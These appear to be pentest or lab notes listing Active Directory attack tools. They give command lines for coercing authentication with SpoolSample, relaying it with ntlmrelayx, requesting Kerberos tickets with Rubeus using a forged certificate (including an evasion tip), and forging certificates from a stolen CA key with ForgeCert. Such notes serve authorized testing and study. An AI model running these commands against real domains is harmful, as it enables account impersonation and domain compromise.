Active Directory Tools

PSPKIAudit

PowerShell toolkit for auditing Active Directory Certificate Services (AD CS).

# Import
Import-Module .\PSPKIAudit.psm1

# Usage
Invoke-PKIAudit
Get-CertRequest

SpoolSample

Tool to coerce Windows hosts into authenticating to other machines via the MS-RPRN RPC interface.

:: Should be executed on the target machine
SpoolSample <Target> <Receiver>

:: Authentication requests can be caught using ntlmrelayx
:: Commands can be specified with -c
ntlmrelayx -smb2support -t smb://<Target> -debug

Rubeus

Tool for raw Kerberos interaction and abuse.

:: [user]        - The user we will impersonate; has to match the UPN of the certificate we generated
:: [enctype]     - The encryption type for the ticket. Setting this is important for evasion, since the default encryption algorithm is weak, which would result in an Overpass-the-Hash alert
:: [certificate] - Path to the certificate we generated
:: [password]    - The password for our certificate file
:: [outfile]     - The file where our TGT will be written
:: [domain]      - The FQDN of the domain we are currently attacking
:: [dc]          - The IP of the domain controller we are requesting the TGT from. Usually it is best to select a DC that has a CA service running
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<CertificateLocation> /password:<Password> /outfile:<OutputFile> /domain:za.adobe.loc /dc:<Target>

ForgeCert

Uses a stolen Certificate Authority (CA) certificate and private key to forge certificates for arbitrary users that are capable of authenticating to Active Directory.

:: [CaCertPath]      - Path to our exported CA certificate
:: [CaCertPassword]  - Password used to encrypt the certificate. By default, Mimikatz assigns the password "mimikatz"
:: [Subject]         - The subject or common name of the certificate
:: [SubjectAltName]  - The User Principal Name (UPN) of the account we want to impersonate with this certificate (it has to be a legitimate user)
:: [NewCertPath]     - Path where ForgeCert will store the generated certificate
:: [NewCertPassword] - The certificate will need its private key exported for authentication purposes, so we must set a new password used to encrypt it
ForgeCert.exe --CaCertPath <CA Path> --CaCertPassword <Password> --Subject CN=User --SubjectAltName <UPN> --NewCertPath <Export Path> --NewCertPassword <Password>

Other

  • Mimikatz: Used to extract plain-text passwords, hashes, PIN codes and Kerberos tickets from memory. Can also perform Pass-the-Hash and Pass-the-Ticket, or build Golden Tickets.
  • Kekeo: Toolbox to manipulate Microsoft Kerberos.